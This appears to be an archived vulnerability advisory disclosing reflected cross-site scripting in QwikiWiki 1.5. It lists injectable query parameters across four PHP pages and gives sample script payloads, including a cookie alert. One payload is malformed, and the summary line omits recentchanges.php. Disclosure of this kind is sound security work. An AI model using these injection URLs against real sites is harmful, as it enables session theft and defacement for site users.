QwikiWiki 1.5 suffers from multiple script injection vulnerabilities in index.php, login.php, and pageindex.php.
6fe9f961b16a9b3fb9bd7dbc6839e54b62f887ed93a529b4a0c5a24e2b3960a6
QwikiWiki 1.5 <== Multiple Script Insertion Vulnerability
===================================
Information of Software:
Software: QwikiWiki 1.5
Site: http://qwikiwiki.com
Description: QwikiWiki is a very simple wiki CMS. It's have most XSS
vulnerability. Is not difficult use it
===================================
Bug:
1) index.php Multiple Script Insertion Vulnerability
QwikiWiki contains a flaw that allows a remote cross site scripting attack.
In the index.php an user can insert an XSS code into the variable Home&from= ,
Home&help and Home&from=Home&help
Example:
http://[target]/index.php?page=Home&from=[XSS]
http://[target]/index.php?page=Home&help=[XSS]
http://[target]/index.php?page=Home&from=Home&help=[XSS]
---------------------------------------------------
2) login.php Multiple Script Insertion Vulnerability
Example:
http://[target]/login.php?page=Home&action=Login&action=[XSS]&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=[XSS]&action=Login&action=Login&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=[XSS]&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=[XSS]&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=[XSS]&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=1&password=[XSS]
---------------------------------------------------
3) pageindex.php Script Insertion Vulnerability
Example:
http://[target]/pageindex.php?nothing=nothing&help=[XSS]
---------------------------------------------------
4) recentchanges.php Script Insertion Vulnerability
Example:
http://[target]/recentchanges.php?nothing=nothing&help=[XSS]
---------------------------------------------------
You can changes the value [XSS] with:
"><body bgcolor="black"></body>
"><alert(document.cookie);</script>
"><script>alert("lol");</script>
and every javascript or HTML code
===================================
Credit:
Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org
===================================